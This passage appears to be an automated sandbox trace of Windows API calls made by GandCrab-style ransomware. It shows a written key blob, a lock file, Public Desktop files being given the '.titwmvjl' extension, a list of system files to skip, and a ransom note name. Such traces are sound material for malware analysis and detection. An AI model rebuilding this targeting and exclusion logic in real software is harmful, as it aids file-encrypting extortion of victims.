2\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.979] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.980] CloseHandle (hObject=0x230) returned 1 [0096.980] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.980] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.980] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x12d)) [0096.980] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.980] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.980] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.981] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.981] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\desktop\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.981] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.981] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.981] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\") returned 24 [0096.982] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0096.982] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5034f8 [0096.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.982] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.982] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.983] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.983] lstrcmpW (lpString1="Acrobat Reader DC.lnk", lpString2=".") returned 1 [0096.983] lstrcmpW (lpString1="Acrobat Reader DC.lnk", lpString2="..") returned 1 [0096.983] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="Acrobat Reader DC.lnk" | out: lpString1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" [0096.983] lstrlenW (lpString=".titwmvjl") returned 9 [0096.983] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned 45 [0096.983] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.983] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk.titwmvjl") returned 54 [0096.983] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned 45 [0096.983] lstrlenW (lpString=".lnk") returned 4 [0096.983] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.983] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0096.983] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.983] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.984] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.984] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.984] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.984] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock" [0096.984] lstrlenW (lpString=".titwmvjl") returned 9 [0096.984] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.984] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.984] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 57 [0096.984] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.984] lstrlenW (lpString=".lock") returned 5 [0096.984] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.984] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.984] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.984] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.984] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.985] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.985] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.985] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Desktop\\desktop.ini") returned="C:\\Users\\Public\\Desktop\\desktop.ini" [0096.985] lstrlenW (lpString=".titwmvjl") returned 9 [0096.985] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0096.985] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.985] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Desktop\\desktop.ini.titwmvjl") returned 44 [0096.985] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0096.985] lstrlenW (lpString=".ini") returned 4 [0096.985] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.985] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0096.985] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0096.985] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.986] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0096.986] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0096.986] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0096.986] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.986] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.986] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0096.986] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0096.986] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="Google Chrome.lnk" | out: lpString1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" [0096.986] lstrlenW (lpString=".titwmvjl") returned 9 [0096.986] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 41 [0096.986] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.986] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk.titwmvjl") returned 50 [0096.986] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 41 [0096.986] lstrlenW (lpString=".lnk") returned 4 [0096.986] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.986] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0096.986] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.987] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.987] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.987] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0096.987] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0096.987] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="Mozilla Firefox.lnk" | out: lpString1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0096.987] lstrlenW (lpString=".titwmvjl") returned 9 [0096.987] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 43 [0096.987] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.987] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.titwmvjl") returned 52 [0096.987] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 43 [0096.987] lstrlenW (lpString=".lnk") returned 4 [0096.987] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.987] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0096.987] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.988] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.988] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.988] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.988] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.988] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt" [0096.988] lstrlenW (lpString=".titwmvjl") returned 9 [0096.988] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt") returned 44 [0096.988] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.988] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 53 [0096.988] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt") returned 44 [0096.988] lstrlenW (lpString=".txt") returned 4 [0096.988] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.988] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.988] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.988] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.989] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt") returned 44 [0096.989] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\TITWMVJL-DECRYPT.txt") returned 44 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.989] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.989] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 